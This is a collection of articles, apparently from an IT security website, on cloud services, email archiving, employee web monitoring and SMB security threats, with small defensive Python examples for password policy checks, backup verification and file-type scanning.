So The Question Arises: What If It Rains In The Cloud?

Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties, and because they believe the solution provider might fail. Funnily enough, it's usually the other way around. Subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing, as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches a security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.

And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.

A drawback with some hosted services is that if you decide you want to delete a cloud resource, this might not result in true wiping of the data. In some cases, adequate or timely deletion might be impossible, for example because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations simply find it difficult to entrust their confidential data to third parties.

Use Your Umbrella

Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: engage the services of a provider that offers high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, that are of limited size and profitability, or that may be subject to M&A activity and changing development priorities.

To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace and that has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides a solid service level agreement, and is committed to cloud services for the long term.

Following these suggestions, you can have peace of mind that your data is unlikely to be subjected to 'bad weather'!

  • Hits: 14910

Three Reasons Why SMEs Should Also Consider Cloud-Based Solutions

Small and medium enterprises (SMEs) are always looking for the optimum way to implement technology within their organizations, be it from a technical, financial or personal perspective. Technology solutions can be delivered using one of three common models: as on-premise solutions (i.e. installed on company premises), as hosted services (handled by an external third party), or as a mix of both. Let's take a look at cloud-based solutions in this brief post.

The Reasons for Cloud-based Backup Solutions

When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most of the latest technology through a third party. Cloud-based solutions and services are gaining in popularity as an alternative strategy for businesses, especially for startups and small businesses, particularly when considering the three reasons below:

•  Financial – Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT systems required when they are starting or still building the business. The additional cost to build an IT infrastructure and recruit IT personnel is at times too high, and not a priority when they just need email and office tools. In such a scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service is necessary and cost-effective.

•  Build your business – The cost-saving aspect is particularly important for those businesses that require a basic IT infrastructure but still want to benefit from security and operational efficiency without spending money on infrastructure. Hosted / managed services give companies the option to test and try technologies before deciding whether they need to move their IT in-house or leave it in the hands of third parties.

•  Pay-as-you-go or rental basis – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie customers in for two or three years, which may be just right for a startup SME, but companies should look closely at any costs associated with stopping the service, and at whether migrating their data would prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable, even if the cost structure appears attractive.

Are There Any Drawbacks To This System?

Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although this is an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.

On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.

Another Option

If you're a server-hugger and need to have that all-important server close to your office, you can always combine your on-premise solution with a hosted or managed service – benefiting from the advantages while doing away with some of the inherent disadvantages.

Every company is different, and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business infrastructure is like and what your needs are at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.

 

  • Hits: 15191

61% of SMEs use Email Archiving in-house – What About the Others ?

A recent survey on email archiving, based on 202 US-based SMEs, found that a growing number of organizations are considering or would consider a third-party hosted email archiving service. A total of 18% of those organizations that already use an email archiving solution have opted for a hosted service, while 38% said they are open to using such a service.

At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.

The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.

articles-email-archiving-1

On-premise or Hosted?

An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost-effective when implemented at the scale which outsourced service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house, security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.

What is Email Archiving?

At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received by all users. This indispensable solution can be used for searches; to meet eDiscovery, compliance audit and review requirements; to increase the overall long-term storage capacity of the email system; and as a disaster recovery repository to ensure data availability.

Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.

An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.

Email archiving solutions are essential for all businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, and deploy the solution which best suits their company's budget and needs.

  • Hits: 13719

Email Security - Can't Live Without It!

This white paper explains why antivirus software alone is not enough to protect your organization against the current and future onslaught of computer viruses. Examining the different kinds of email threats and email attack methods, this paper describes the need for a solid server-based content-checking gateway to safeguard your business against email viruses and attacks as well as information leaks.

We apologize but this paper is no longer available. Back to the Security Articles section.

  • Hits: 11751

Log-Based Intrusion-Detection and Analysis in Windows Servers

Introduction - How to Perform Network-Wide Security Event Log Management

Microsoft Windows machines have basic audit facilities, but they fall short of fulfilling real-life business needs (i.e., monitoring Windows computers in real time, periodically analyzing security activity, and maintaining a long-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.

This paper explains how EventsManager's innovative architecture can fill the gaps in Windows' security log functionality – without hurting performance and while remaining cost-effective. It discusses the use of EventsManager to implement best practice and fulfill due diligence requirements imposed by auditors and regulatory agencies, and provides strategies for making maximum use of GFI EventsManager's capabilities.

This white paper is no longer available from the vendor. To read similar interesting security articles, please visit our Security Articles section.

  • Hits: 13695

Web Monitoring for Employee Productivity Enhancement

All too often, when web monitoring and Internet use restrictions are put into place, they hurt company morale and do little to enhance employee productivity. Not wanting to create friction in the workplace, many employers shy away from using what could be a significant employee productivity enhancement tool. Wasting time through Internet activities is easy, and it is a huge hidden cost to business. Just answering a few personal emails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour each day. If the company has an 8-person CAD department and each of them spends an hour a day on the above activities, that's a whole employee wasted!

Employees both want and don’t want to have their Internet use restricted. The key to success in gaining productivity and employee acceptance of the problem is the perception of fairness, clear goals and self enforcement.

Why Employees Don’t Want Internet Blocking

  1. They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.
  2. Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.
  3. There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?

Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.

Why Employers are Afraid of Internet Blocking

  • The potential of adding to IT costs and human resources headaches takes away the value of web monitoring. The Internet is a big place and employees are smart. Employers don't want to get into a situation where they are simply chasing their tail, trading one productivity loss for incurred costs and frustration elsewhere.
  • Employers want to allow employees freedom. There is general recognition by employers that a happy employee is a loyal, productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave, and an increase in turnover can be costly.

The fear of trading one cost for another, or one headache for another, has prevented many employers from implementing Internet monitoring and blocking. A mistrust of IT services may also come into play. Technology got us into this situation – where up to 20% of employee time is spent on the Internet – and many employers don't trust that technology can also help them gain that productivity back. A monitoring program needs to be simple to implement and maintain.

Why Employees Want Internet Controls

  • Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on eBay, reading personal e-mail or chatting on IM, every other employee in the office knows it and resents it. If they are working hard, everyone else should be too.
  • Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.
  • Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.

How Employers can Gain Employee Support for Web Monitoring

  • Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.
  • Policies that make sense to staff are easy to enforce
  • Policies with goals are easy to measure
  • When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.
  • Empower your employees. Whitelist, don't blacklist. Let each employee actively participate in deciding which sites are allowed and which aren't for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked.
  • Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.
  • Show employees the web monitoring reports. Let them see the before and after, and let them see the ongoing reports. This will encourage self-monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care to make themselves look good.
  • Send employees a weekly report on their Internet usage. They will look at it and act on it to make sure they are portrayed to management in the best light, and may even compare themselves against others.

Summary

Web monitoring is good for business. The Internet as a productivity tool has wide acceptance, but recent changes have brought new distractions, costing business some of those productivity gains. Internet use can be controlled, but it needs to be done in a way that allows for employee buy-in, self-monitoring and self-enforcement to be successful.

  • Hits: 13346

Security Threats: A Guide for Small & Medium Businesses

A successful business works on the basis of revenue growth and loss prevention. Small and medium-sized businesses are hit particularly hard when either one or both of these business requirements suffer. Data leakage, downtime and reputation loss can easily turn away new and existing customers if such situations are not handled appropriately and quickly. This may, in turn, impact the company's bottom line and ultimately profit margins. A computer virus outbreak or a network breach can cost a business thousands of dollars. In some cases, it may even lead to legal liability and lawsuits.

The truth is that many organizations would like to have a secure IT environment, but very often this need comes into conflict with other priorities. Firms often find the task of keeping business functions aligned with the security process highly challenging. When economic circumstances look dire, it is easy to turn security into a checklist item that keeps being pushed back. The reality, however, is that in such situations security should be a primary concern: the likelihood of threats affecting your business will probably increase, and the impact can be more detrimental if it tarnishes your reputation. This paper aims to help small and medium-sized businesses focus on threats that are likely to have an impact on, and affect, the organization.

These threats specifically target small and medium-sized businesses rather than enterprise companies or home users.

Security Threats That Affect SMBs - Malicious Internet Content

Most modern small or medium-sized businesses need an Internet connection to operate. If you remove this means of communication, many areas of the organization will not be able to function properly, or else they may be forced to revert to old, inefficient systems. Just think how important email has become and that, for many organizations, this is the primary means of communication. Even phone communications are changing shape, with Voice over IP becoming a standard in many organizations. At some point, most organizations have been the victim of a computer virus attack.

While many may have antivirus protection, it is not unusual for an organization of more than 10 employees to use email or the Internet without any form of protection. Even large organizations are not spared. Recently, three hospitals in London had to shut down their entire network due to an infection by a version of a worm called Mytob. Most of the time we do not hear of small or medium-sized businesses becoming victims of such infections because it is not in their interest to publicize these incidents. Many small or medium-sized business networks cannot afford to employ prevention mechanisms such as network segregation.

These factors simply make it easier for a worm to spread throughout an organization. Malware is a term that includes computer viruses, worms, Trojans and any other kinds of malicious software. Employees and end users within an organization may unknowingly introduce malware onto the network when they run malicious executable code (EXE files). Sometimes they might receive an email with an attached worm or download spyware when visiting a malicious website. Alternatively, to get work done, employees may decide to install pirated software for which they do not have a license. This software tends to have more code than advertised and is a common method used by malware writers to infect end users' computers. An organization that operates efficiently usually has established ways to share files and content across the organization. These methods can also be abused by worms to further infect computer systems on the network. Computer malware does not have to be introduced manually or consciously.

Basic software packages installed on desktop computers, such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash, have their fair share of security vulnerabilities. These security weaknesses are actively exploited by malware writers to automatically infect victims' computers. Such attacks are known as drive-by downloads because the user is not aware of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert [1] describing 450,000 web pages that can install malware without the user's consent.

Then You Get Social Engineering Attacks

This term refers to a set of techniques whereby attackers make the most of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type of social engineering attack that is normally opportunistic and targets a subset of society. A phishing email message will typically look very familiar to the end user – it will make use of genuine logos and other visuals (from a well-known bank, for example) and will, to all intents and purposes, appear to be the genuine thing. When the end user follows the instructions in the email, he or she is directed to reveal sensitive or private information such as passwords, PIN codes and credit card numbers.

Employees and desktop computers are not the only targets in an organization. Most small or medium-sized companies need to make use of servers for email, customer relationship management and file sharing. These servers tend to hold critical information that can easily become the target of an attack. Additionally, the move towards web applications has introduced a large number of new security vulnerabilities that are actively exploited by attackers to gain access to these web applications. If these services are compromised, there is a high risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.

Attacks on Physical Systems

Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles are entrusted with the most sensitive information about the organization. These devices, whether they are company property or personally owned, often contain company documents and are used to log on to the company network. More often than not, these mobile devices are also used during conferences and travel, thus running the risk of physical theft.

The number of laptops and mobile devices stolen per year is ever on the increase. Attrition.org had over 400 articles in 2008 [2] related to high-profile data loss, many of which involved stolen laptops and missing disks. If it happens to major hospitals and governments that have established rules on handling such situations, why should it not happen to smaller businesses?

Another Threat Affecting Physical Security is that of Unprotected Endpoints

USB ports and DVD drives can both be used to leak data and introduce malware onto the network. A USB stick that is mainly used for work and may contain sensitive documents becomes a security risk if it is taken home and left lying around, and other members of the family use it on their home PC. While the employee may understand the sensitive nature of the information stored on the USB stick, the rest of the family probably will not.

They may copy files back and forth without considering the implications. This is typically a case of negligence, but it can also be the work of a targeted attack, where internal employees take large amounts of information out of the company. Small and medium-sized businesses may also overlook the importance of securing the physical network and server room to prevent unauthorized persons from gaining access. Open network points and unprotected server rooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture unencrypted network traffic and steal passwords and content.

Authentication and Privilege Attacks

Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure system whereby people are required to choose a unique password that others cannot guess but that is still easy for them to remember. Nowadays most people have at least five other passwords to remember, and the password used for company business should not be the same one used for webmail accounts, site memberships and so on. High-profile intrusions such as the one on Twitter [3] (the password was 'happiness') clearly show that passwords are often the most common and universal security weakness, and attacks exploiting this weakness do not require a lot of technical knowledge.

Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will find ways and means to get around it. They will write the password on sticky notes, share it with their colleagues or simply pick a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess.
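The point is easy to demonstrate in a few lines of code. The sketch below is only an illustration: a password like 1q2w3e4r5t sails straight through a naive complexity check, so a sensible policy also needs a blacklist of keyboard walks and other predictable patterns (the rules and word list shown are examples, not a recommended policy).

    import re

    KEYBOARD_WALKS = ["1q2w3e4r5t", "qwerty", "asdfgh", "qazwsx"]

    def passes_naive_policy(pw):
        # "at least 8 characters, contains a letter and a digit" -- easy to satisfy
        return len(pw) >= 8 and bool(re.search(r"[a-zA-Z]", pw)) and bool(re.search(r"\d", pw))

    def looks_predictable(pw):
        lowered = pw.lower()
        return any(walk in lowered for walk in KEYBOARD_WALKS)

    for candidate in ["1q2w3e4r5t", "Tr0ub4dor&3"]:
        print(candidate,
              "passes naive policy:", passes_naive_policy(candidate),
              "predictable:", looks_predictable(candidate))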

Most complex password policies can easily be rendered useless by non-technological means. In small and medium-sized businesses, systems administrators are often found doing the work of network operators and project managers as well as security analysts. Therefore a disgruntled systems administrator will be a major security problem due to the amount of responsibility (and access rights) that he or she holds. With full access privileges, a systems administrator may plant a logic bomb, create backdoor accounts or leak sensitive company information that may greatly affect the stability and reputation of the organization. Additionally, in many cases the systems administrator is the person who sets the passwords for important services or servers. When he or she leaves the organization, these passwords may not be changed (especially if not documented), thus leaving a backdoor for the ex-employee.

A startup company called JournalSpace [4] was caught with no backups when their former system administrator decided to wipe out the main database. This proved to be disastrous for the company, which ended up asking users to retrieve their content from Google's cache. The company's management team may also have administrative privileges on their personal computers or laptops. The reasons vary, but they may want to be able to install new software or simply to have more control over their machines. The problem with this scenario is that one compromised machine is all that an attacker needs to target an organization.

The firm itself does not need to be specifically picked out but may simply become the victim of an attack aimed at a particular vulnerable software package. Even when user accounts on the network are supposed to have reduced privileges, there may be times when privilege creep occurs. For example, a manager who hands over an old project to another manager may retain the old privileges for years, even after the handover!

When his or her account is compromised, the intruder also gains access to the old project. Employees with mobile devices and laptop computers can pose a significant risk when they make use of unsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases, inadequate or no encryption is used and anyone 'in between' can view and modify the network traffic. This can be the start of an intrusion leading to compromised company accounts and networks.

Denial Of Service

In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesses have various single points of failure. Denial of service is an attack that prevents legitimate users from making use of a service, and it can be very hard to prevent. The means to carry out a DoS attack and the motives may vary, but it typically leads to downtime and legitimate customers losing confidence in the organization - and it is not necessarily due to an Internet-borne incident.

In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtime due to damage to the underwater Internet cables. Some of these organizations relied on a single Internet connection, and their business was driven by Internet communications.

Having such a single point of failure proved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability is a major concern for most businesses, and the inability to address even one single point of failure can be costly. If an organization is not prepared for a security incident, it will probably not handle the situation appropriately.

One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps that need to be taken to get the systems back in shape? If an organization is simply relying on the systems administrator to handle such incidents, then that organization is not acknowledging that such a situation is not simply technical in nature. It is important to be able to identify the entry point, to approach the persons concerned and to have policies in place to prevent future occurrences - apart from simply removing the virus from the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc, then that is a formula for lengthy downtime.

Addressing Security Threats - An Anti-virus is not an Option

The volume of malware that can hit organizations today is enormous and the attack vectors are multiple. Viruses may spread through email, websites, USB sticks and instant messenger programs, to name but a few. If an organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercy of the end user – and relying on the end user is not advisable or worth the risk.

Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktop computer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disable your anti-virus software, firewalls and so on. Therefore you do not want the virus to reach your desktop computer in the first place! The solution is to deploy content filtering at the gateway.

Anti-virus can be part of the content filtering strategy, which can be installed at the email and web gateway. Email accounts are frequently spammed with malicious email attachments. These files often appear to come from legitimate contacts, thus fooling the end user into running the malware code. Leaving the decision of whether or not to trust an attachment received by email to the user is never a good idea.

By blocking malware at the email gateway, you greatly reduce the risk that end users may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic for malicious code addresses a major infection vector and is a requirement when running a secure network environment.

Security Awareness

A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely on social engineering and people's willingness to trust others. There are two extremes: either employees in an organization totally mistrust each other, to such an extent that the sharing of data or information is nil; or, at the other end of the scale, there is total trust between all employees.

Neither approach is desirable. There has to be an element of trust throughout an organization, but checks and balances are just as important. Employees need to be given the opportunity to work and share data, but they must also be aware of the security issues that arise as a result of their actions. This is why a security awareness program is so important. For example, malware often relies on victims running an executable file in order to spread and infect a computer or network.

Telling your employees not to open emails from unknown senders is not enough. They need to be told that in doing so they risk losing all their work, their passwords and other confidential details to third parties. They need to understand what behavior is acceptable when dealing with email and web content. Anything suspicious should be reported to someone who can handle security incidents. Having open communication across different departments makes for better information security, since many social engineering attacks abuse the communication breakdowns between departments.

Additionally, it is important to keep in mind that a positive working environment, where people are happy in their job, is less susceptible to insider attacks than an oppressive workplace.

Endpoint Security

A lot of information in an organization is not centralized. Even when there is a central system, information is often shared between different users and devices, and copied numerous times. In contrast with perimeter security, endpoint security is the concept that each device in an organization needs to be secured. It is recommended that sensitive information be encrypted on portable devices such as laptops.

Additionally,removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to bea major threat vector for malware infections or data leakage.Securing endpoints on a network may require extensive planning and auditing. For example, policies can beapplied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also makesense to restrict usage of wireless (WiFi) access points.

Policies

Policies are the basis of every information security program. It is useless taking security precautions or trying to manage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is not allowed in an organization, as well as define the procedures that apply in different situations. They should be clear and have the full backing of senior management. Finally, they need to be communicated to the organization’s staff and enforced accordingly.

There are various policies, some of which can be enforced through technology and others which have to be enforced through human resources. For example, password complexity policies can be enforced through Windows domain policies. On the other hand, a policy which ensures that company USB sticks are not taken home may need to be enforced through awareness and labeling.
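
As a rough illustration of the kind of rule such a technical control can enforce, the sketch below checks a candidate password against a hypothetical complexity policy (a minimum length plus at least three of four character classes). The thresholds are assumptions made for the example, not a description of any specific Windows domain policy.

```python
import re

# Hypothetical policy values, chosen for illustration only.
MIN_LENGTH = 10

def meets_complexity_policy(password: str) -> bool:
    """Return True if the password is at least MIN_LENGTH characters long
    and contains at least three of the four character classes."""
    if len(password) < MIN_LENGTH:
        return False
    classes = [
        re.search(r"[A-Z]", password),        # upper case
        re.search(r"[a-z]", password),        # lower case
        re.search(r"[0-9]", password),        # digits
        re.search(r"[^A-Za-z0-9]", password), # symbols
    ]
    return sum(1 for c in classes if c) >= 3

if __name__ == "__main__":
    for candidate in ("summer2024", "S3cure!Passphrase"):
        print(candidate, meets_complexity_policy(candidate))
```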

As with most security precautions, it is important that policies that affect security are driven by business objectives rather than gut feelings. If security policies are too strict, they will be bypassed, thus creating a false sense of security and possibly creating new attack vectors.

Role Separation

Separation of duties, auditing and the principle of least privilege can go a long way in protecting an organization from having single points of failure and privilege creep. By employing separation of duties, the impact of a particular employee turning against the organization is greatly reduced. For example, a system administrator who is not allowed to make alterations to the database server directly, but has to ask the database administrator and document his actions, is a good use of separation of duties.

A security analyst who receives a report when a network operator makes changes to the firewall access control lists is a good application of auditing. If a manager has no business need to install software on a regular basis, then his or her account should not be granted such privileges (power user on Windows). These concepts are very important, and it all boils down to who is watching the watchers.

Backup and Redundant Systems

Although less glamorous than other topics in Information Security, backups remain one of the most reliable solutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occur, and an organization will come across situations when hardware fails or a user (intentionally or otherwise) deletes important data.

A well-managed and tested backup system will get the business back up and running in very little time compared to other disaster recovery solutions. It is therefore important that backups are not only automated to avoid human error but also periodically tested. It is useless having a backup system if restoration does not function as advertised. Redundant systems allow a business to continue working even if a disaster occurs.

Backup servers and alternative network connections can help to reduce downtime, or at least provide a business with limited resources until all systems and data are restored.
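
To make the "automated and periodically tested" point concrete, here is a minimal Python sketch that copies a directory to a backup location and then verifies the copy by comparing file checksums. The paths and the verification approach are illustrative assumptions rather than a recommendation of any particular backup product.

```python
import hashlib
import shutil
from pathlib import Path

def file_digest(path: Path) -> str:
    # Hash the file contents so the copy can be verified bit-for-bit.
    return hashlib.sha256(path.read_bytes()).hexdigest()

def backup_and_verify(source: Path, destination: Path) -> bool:
    """Copy a directory tree and confirm every file's checksum matches."""
    shutil.copytree(source, destination, dirs_exist_ok=True)
    for original in source.rglob("*"):
        if original.is_file():
            copy = destination / original.relative_to(source)
            if not copy.is_file() or file_digest(copy) != file_digest(original):
                return False  # Verification failed - alert an administrator.
    return True

if __name__ == "__main__":
    # Example paths are placeholders.
    ok = backup_and_verify(Path("/srv/data"), Path("/mnt/backup/data"))
    print("Backup verified" if ok else "Backup verification FAILED")
```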

Keeping your Systems Patched

New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easy task to stay up-to-date with all the vulnerabilities that apply to software installed on the network, therefore many organizations make use of a patch management system to handle the task. It is important to note that patches and security updates are not only issued for Microsoft products but also for third party software. For example, although the web browser is running the latest updates, a desktop can still be compromised when visiting a website simply because it is running a vulnerable version of Adobe Flash.

Additionally, it may be important to assess the impact of a vulnerability before applying a patch, rather than applying patches religiously. It is also important to test security updates before applying them to a live system. The reason is that, from time to time, vendors issue patches that may conflict with other systems or that were not tested for your particular configuration.

Additionally, security updates may sometimes result in temporary downtime.

Reducing Exposure

Simple systems are easier to manage and therefore any security issues that apply to such systems can be addressed with relative ease. However, complex systems and networks make it harder for a security analyst to assess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration will be quite straightforward. However, the greater the company’s need to be visible – an online retailer, for example – the more complex the firewall configuration will be, leaving room for possible security holes that could be exploited by attackers to access internal network services.

When servers and desktop computers have fewer software packages installed, they are easier to keep up-to-date and manage. This concept can work hand in hand with the principle of least privilege. By making use of fewer components, less software and fewer privileges, you reduce the attack surface while allowing security efforts to be focused on tackling real issues.

Conclusion

Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009, cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. This document aims to give managers, analysts, administrators and operators in small and medium-sized businesses a snapshot of the IT security threats facing their organization. Every organization is different, but in many instances the threats are common to all. Security is a cost of doing business, but those that prepare themselves well against possible threats will benefit the most in the long term.



  • Hits: 32516

Web Security Software Dealing With Malware

It is widely acknowledged that any responsible modern-day organization will strive to protect its network against malware attacks. Each day brings on a spawning of increasingly sophisticated viruses, worms, spyware, Trojans, and all other kinds of malicious software which can ultimately lead to an organization's network being compromised or brought down. Private information can be inadvertently leaked, a company's network can crash; whatever the outcome, poor security strategies could equal disaster. Having a network that is connected to the Internet leaves you vulnerable to attack, but Internet access is an absolute necessity for most organizations, so the wise thing to do would be to have a decent web security package installed on your machines, preferably at the gateway.

There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.

Web security can never be one hundred percent guaranteed at all times, but there are ways to significantly minimize the risks. It is good and usual practice to use an antivirus engine to help protect your network, but it would naturally be much better to use several of them at once. Why is this? If, hypothetically speaking, your organization uses product A and a new virus breaks out, it might be Lab A, Lab B, or any other antivirus lab which releases an update the fastest. So the logical conclusion would be that the more AV engines you make use of, the greater the likelihood of you nipping that attack in the bud.

This is one of the ways in which web security software can give you better peace of mind. Files which are downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which could significantly reduce the time it will take to obtain the latest virus signatures, therefore diminishing the risk to your site by each new attack.
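
The multi-engine idea can be sketched in a few lines of Python; the engines below are hypothetical stand-ins for real scanning back-ends, and the point is simply that a download is blocked if any one engine flags it.

```python
from typing import Callable, Iterable

# Each "engine" is modelled as a function returning True when it flags a file.
# A real product would wrap vendor SDKs or command-line scanners here.
Engine = Callable[[bytes], bool]

def scan_with_engines(data: bytes, engines: Iterable[Engine]) -> bool:
    """Return True (block the download) if ANY engine detects malware."""
    return any(engine(data) for engine in engines)

# Toy signature-based engines, for illustration only.
engine_a = lambda data: b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE" in data
engine_b = lambda data: b"malicious-marker" in data

if __name__ == "__main__":
    sample = b"X5O!...EICAR-STANDARD-ANTIVIRUS-TEST-FILE!..."
    print("Blocked" if scan_with_engines(sample, [engine_a, engine_b]) else "Allowed")
```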

Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types of HTTP/FTP file downloads, making sure that files which are downloaded contain no viruses or malware.
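
Detecting the "real" file type usually means inspecting a file's leading magic bytes rather than trusting its name. The following sketch uses a deliberately tiny signature table (an assumption made for illustration) to flag a Windows executable that has been renamed to look like an MP3.

```python
# Minimal magic-byte table for illustration; real engines know hundreds of types.
MAGIC_SIGNATURES = {
    b"MZ": "Windows executable",
    b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP archive",
}

def detect_real_type(data: bytes) -> str:
    for magic, description in MAGIC_SIGNATURES.items():
        if data.startswith(magic):
            return description
    return "unknown"

def is_disguised_executable(filename: str, data: bytes) -> bool:
    """True when the content is an executable but the name claims otherwise."""
    return (detect_real_type(data) == "Windows executable"
            and not filename.lower().endswith(".exe"))

if __name__ == "__main__":
    payload = b"MZ\x90\x00" + b"\x00" * 16   # fake PE header for the example
    print(is_disguised_executable("holiday_song.mp3", payload))  # True
```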

The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict where the next patch will come from. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.

  • Hits: 13195

The Web Security Strategy for Your Organization

In today's business world, internet usage has become a necessity for doing business. Unfortunately, a company's use of the internet comes with considerable risk to its network and business information.

Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network are usually costly from both the dollar aspect as well as the time spent recovering from these web security threats.

Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.

Employee Internet Usage Policy

The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.

Employee Education

